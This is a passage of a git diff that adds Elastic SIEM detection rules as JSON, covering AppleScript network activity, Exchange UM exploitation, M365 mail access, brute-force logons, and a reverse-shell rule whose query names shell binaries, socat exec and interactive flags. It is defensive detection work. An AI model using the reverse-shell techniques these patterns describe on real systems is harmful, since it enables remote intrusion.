+{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects execution via the Apple script interpreter (osascript) followed by a network connection from the same process within a short time period. Adversaries may use malicious scripts for execution and command and control.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Apple Script Execution followed by Network Connection", + "query": "sequence by host.id, process.entity_id with maxspan=30s\n [process where host.os.type == \"macos\" and event.type == \"start\" and process.name == \"osascript\"]\n [network where host.os.type == \"macos\" and event.type != \"end\" and process.name == \"osascript\" and destination.ip != \"::1\" and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html", + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "47f76567-d58a-4fed-b32b-21f571e28910", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.002", + "name": "AppleScript", + "reference": "https://attack.mitre.org/techniques/T1059/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "47f76567-d58a-4fed-b32b-21f571e28910_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108.json new file mode 100644 index 00000000000..b0483a7b717 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857.", + "false_positives": [ + "Legitimate processes may be spawned from the Microsoft Exchange Server Unified Messaging (UM) service. If known processes are causing false positives, they can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\werfault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V??\\\\Bin\\\\UMWorkerProcess.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange 2016\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\ExchangeServer\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\Exchange Server\\\\V15\\\\Bin\\\\UMWorkerProcess.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109.json new file mode 100644 index 00000000000..dfc199b2e6a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857.", + "false_positives": [ + "Legitimate processes may be spawned from the Microsoft Exchange Server Unified Messaging (UM) service. If known processes are causing false positives, they can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\werfault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V??\\\\Bin\\\\UMWorkerProcess.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange 2016\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\ExchangeServer\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\Exchange Server\\\\V15\\\\Bin\\\\UMWorkerProcess.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_105.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_105.json new file mode 100644 index 00000000000..2478d969a2a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_105.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days.", + "false_positives": [ + "User using a new mail client." + ], + "from": "now-30m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Microsoft 365 Mail Access by ClientAppId", + "new_terms_fields": [ + "o365.audit.ClientAppId", + "user.id" + ], + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:MailItemsAccessed and event.outcome:success\n", + "references": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48819484-9826-4083-9eba-1da74cd0eaf2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "48819484-9826-4083-9eba-1da74cd0eaf2_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_2.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_2.json new file mode 100644 index 00000000000..a8afcd5c5bc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_2.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days.", + "false_positives": [ + "User using a new mail client." + ], + "from": "now-30m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Microsoft 365 Mail Access by ClientAppId", + "new_terms_fields": [ + "o365.audit.ClientAppId", + "user.id" + ], + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:MailItemsAccessed and event.outcome:success\n", + "references": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48819484-9826-4083-9eba-1da74cd0eaf2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "48819484-9826-4083-9eba-1da74cd0eaf2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_4.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_4.json new file mode 100644 index 00000000000..5d6aeb11de5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_4.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days.", + "false_positives": [ + "User using a new mail client." + ], + "from": "now-30m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Microsoft 365 Mail Access by ClientAppId", + "new_terms_fields": [ + "o365.audit.ClientAppId", + "user.id" + ], + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:MailItemsAccessed and event.outcome:success\n", + "references": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48819484-9826-4083-9eba-1da74cd0eaf2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "48819484-9826-4083-9eba-1da74cd0eaf2_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8.json new file mode 100644 index 00000000000..a4336de5236 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell", + "query": "sequence by host.id with maxspan=5s\n [network where event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"socat\") and destination.ip != null and \n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")] by process.entity_id\n [process where event.type == \"start\" and event.action in (\"exec\", \"fork\") and \n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\")\n )] by process.parent.entity_id\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48b3d2e3-f4e8-41e6-95e6-9b2091228db3", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 8 + }, + "id": "48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_9.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_9.json new file mode 100644 index 00000000000..71351da26d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_9.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Multiple Logon Failure from the same Source Address", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer 